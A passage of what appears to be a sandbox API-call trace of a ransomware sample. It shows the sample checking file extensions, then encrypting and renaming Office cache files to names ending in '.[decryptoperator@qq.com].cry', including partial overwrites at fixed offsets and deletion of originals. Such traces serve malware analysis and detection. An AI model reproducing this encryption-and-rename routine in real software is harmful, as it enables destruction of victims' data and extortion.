(lpString1=".xlsx", lpString2="R.cab") returned -1 [0044.510] lstrlenW (lpString=".ppt") returned 4 [0044.510] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0044.510] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0044.510] lstrlenW (lpString=".zip") returned 4 [0044.510] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0044.510] lstrlenW (lpString=".rar") returned 4 [0044.510] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0044.510] lstrlenW (lpString=".bz2") returned 4 [0044.510] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0044.510] lstrlenW (lpString=".7z") returned 3 [0044.510] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0044.510] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0044.510] lstrlenW (lpString=".dbf") returned 4 [0044.510] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0044.510] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0044.510] lstrlenW (lpString=".1cd") returned 4 [0044.510] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0044.510] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0044.510] lstrlenW (lpString=".jpg") returned 4 [0044.510] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0044.510] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0044.511] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0044.511] lstrlenW (lpString=".doc") returned 4 [0044.511] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0044.511] lstrlenW (lpString=".docx") returned 5 [0044.511] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0044.511] lstrlenW (lpString=".pdf") returned 4 [0044.511] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0044.511] lstrlenW (lpString=".xls") returned 4 [0044.511] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0044.511] lstrlenW (lpString=".xlsx") returned 5 [0044.511] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0044.511] lstrlenW (lpString=".ppt") returned 4 [0044.511] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0044.511] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0044.511] lstrlenW (lpString=".zip") returned 4 [0044.511] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0044.511] lstrlenW (lpString=".rar") returned 4 [0044.511] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0044.511] lstrlenW (lpString=".bz2") returned 4 [0044.511] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0044.511] lstrlenW (lpString=".7z") returned 3 [0044.511] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0044.511] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0044.515] lstrlenW (lpString=".dbf") returned 4 [0044.515] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0044.515] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0044.515] lstrlenW (lpString=".1cd") returned 4 [0044.515] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0044.515] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0044.515] lstrlenW (lpString=".jpg") returned 4 [0044.515] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0044.515] lstrcmpiW (lpString1=".cab", lpString2=".cry") returned -1 [0044.515] lstrlenW (lpString="GrooveLR.cab") returned 12 [0044.515] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0044.515] GetFileSizeEx (in: hFile=0x1ac, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=4095519) returned 1 [0044.515] CloseHandle (hObject=0x1ac) returned 1 [0044.515] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab")) returned 0x2020 [0044.516] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0044.516] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0044.516] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0044.516] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0x0) returned 1 [0044.516] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.516] ReadFile (in: hFile=0x1ac, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b70058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.627] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x14d4b5, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.627] ReadFile (in: hFile=0x1ac, lpBuffer=0x3bb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bb0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.665] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0044.665] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x3a7e1f, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.665] ReadFile (in: hFile=0x1ac, lpBuffer=0x3bf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bf0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.932] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.932] WriteFile (in: hFile=0x1ac, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x301fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0044.953] SetEndOfFile (hFile=0x1ac) returned 1 [0044.953] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3fd40b0 [0044.953] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.953] WriteFile (in: hFile=0x1ac, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.954] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x14d4b5, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.954] WriteFile (in: hFile=0x1ac, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.956] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x3a7e1f, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.956] WriteFile (in: hFile=0x1ac, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.958] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3fd40b0 | out: hHeap=0x600000) returned 1 [0044.958] CloseHandle (hObject=0x1ac) returned 1 [0044.958] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0044.958] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0044.958] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0044.958] lstrlenW (lpString=".doc") returned 4 [0044.958] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0044.958] lstrlenW (lpString=".docx") returned 5 [0044.958] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0044.958] lstrlenW (lpString=".pdf") returned 4 [0044.958] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0044.958] lstrlenW (lpString=".xls") returned 4 [0044.958] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0044.958] lstrlenW (lpString=".xlsx") returned 5 [0044.958] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0044.958] lstrlenW (lpString=".ppt") returned 4 [0044.958] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0044.958] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0044.959] lstrlenW (lpString=".zip") returned 4 [0044.959] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0044.959] lstrlenW (lpString=".rar") returned 4 [0044.959] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0044.959] lstrlenW (lpString=".bz2") returned 4 [0044.959] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0044.959] lstrlenW (lpString=".7z") returned 3 [0044.959] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0044.959] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0044.959] lstrlenW (lpString=".dbf") returned 4 [0044.959] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0044.959] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0044.959] lstrlenW (lpString=".1cd") returned 4 [0044.959] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0044.959] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0044.959] lstrlenW (lpString=".jpg") returned 4 [0044.959] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0044.959] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0044.959] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0044.959] lstrlenW (lpString=".doc") returned 4 [0044.959] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0044.959] lstrlenW (lpString=".docx") returned 5 [0044.959] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0044.959] lstrlenW (lpString=".pdf") returned 4 [0044.959] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0044.959] lstrlenW (lpString=".xls") returned 4 [0044.959] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0044.959] lstrlenW (lpString=".xlsx") returned 5 [0044.959] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0044.959] lstrlenW (lpString=".ppt") returned 4 [0044.959] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0044.959] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0044.959] lstrlenW (lpString=".zip") returned 4 [0044.959] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0044.959] lstrlenW (lpString=".rar") returned 4 [0044.959] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0044.959] lstrlenW (lpString=".bz2") returned 4 [0044.959] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0044.959] lstrlenW (lpString=".7z") returned 3 [0044.960] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0044.960] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0044.960] lstrlenW (lpString=".dbf") returned 4 [0044.960] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0044.960] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0044.960] lstrlenW (lpString=".1cd") returned 4 [0044.960] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0044.960] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0044.960] lstrlenW (lpString=".jpg") returned 4 [0044.960] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0044.960] lstrcmpiW (lpString1=".dll", lpString2=".cry") returned 1 [0044.960] lstrlenW (lpString="dwdcw20.dll") returned 11 [0044.960] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0045.776] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=526176) returned 1 [0045.776] CloseHandle (hObject=0x210) returned 1 [0045.777] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll")) returned 0x2020 [0045.777] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0045.777] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0045.777] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.777] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.777] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0045.847] GetLastError () returned 0x0 [0045.847] ReadFile (in: hFile=0x210, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0x80760, lpOverlapped=0x0) returned 1 [0047.069] WriteFile (in: hFile=0x214, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0x80770, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0x80770, lpOverlapped=0x0) returned 1 [0047.078] ReadFile (in: hFile=0x210, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.079] WriteFile (in: hFile=0x214, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.079] SetEndOfFile (hFile=0x214) returned 1 [0047.079] CloseHandle (hObject=0x214) returned 1 [0047.079] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.079] SetEndOfFile (hFile=0x210) returned 1 [0047.083] CloseHandle (hObject=0x210) returned 1 [0047.084] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0047.084] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll")) returned 1 [0047.084] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0047.084] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0047.084] lstrlenW (lpString=".doc") returned 4 [0047.084] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.084] lstrlenW (lpString=".docx") returned 5 [0047.084] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0047.084] lstrlenW (lpString=".pdf") returned 4 [0047.084] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.084] lstrlenW (lpString=".xls") returned 4 [0047.084] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.084] lstrlenW (lpString=".xlsx") returned 5 [0047.084] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0047.084] lstrlenW (lpString=".ppt") returned 4 [0047.084] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.084] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0047.084] lstrlenW (lpString=".zip") returned 4 [0047.084] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.085] lstrlenW (lpString=".rar") returned 4 [0047.085] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.085] lstrlenW (lpString=".bz2") returned 4 [0047.085] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.085] lstrlenW (lpString=".7z") returned 3 [0047.085] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.085] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0047.085] lstrlenW (lpString=".dbf") returned 4 [0047.085] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.085] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0047.085] lstrlenW (lpString=".1cd") returned 4 [0047.085] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.085] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0047.085] lstrlenW (lpString=".jpg") returned 4 [0047.085] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.085] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0047.085] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0047.085] lstrlenW (lpString=".doc") returned 4 [0047.085] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.085] lstrlenW (lpString=".docx") returned 5 [0047.085] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0047.085] lstrlenW (lpString=".pdf") returned 4 [0047.085] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.085] lstrlenW (lpString=".xls") returned 4 [0047.085] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.085] lstrlenW (lpString=".xlsx") returned 5 [0047.085] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0047.085] lstrlenW (lpString=".ppt") returned 4 [0047.085] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.085] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0047.085] lstrlenW (lpString=".zip") returned 4 [0047.085] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.085] lstrlenW (lpString=".rar") returned 4 [0047.085] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.085] lstrlenW (lpString=".bz2") returned 4 [0047.085] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.085] lstrlenW (lpString=".7z") returned 3 [0047.085] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.085] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0047.085] lstrlenW (lpString=".dbf") returned 4 [0047.086] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.086] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0047.086] lstrlenW (lpString=".1cd") returned 4 [0047.086] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.086] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0047.086] lstrlenW (lpString=".jpg") returned 4 [0047.086] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.086] lstrcmpiW (lpString1=".dll", lpString2=".cry") returned 1 [0047.086] lstrlenW (lpString="osetupui.dll") returned 12 [0047.086] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.086] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=191872) returned 1 [0047.086] CloseHandle (hObject=0x210) returned 1 [0047.086] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll")) returned 0x2020 [0047.086] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0047.086] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.086] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.087] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.087] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0047.087] GetLastError () returned 0x0 [0047.087] ReadFile (in: hFile=0x210, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0x2ed80, lpOverlapped=0x0) returned 1 [0047.176] WriteFile (in: hFile=0x214, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0x2ed90, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: 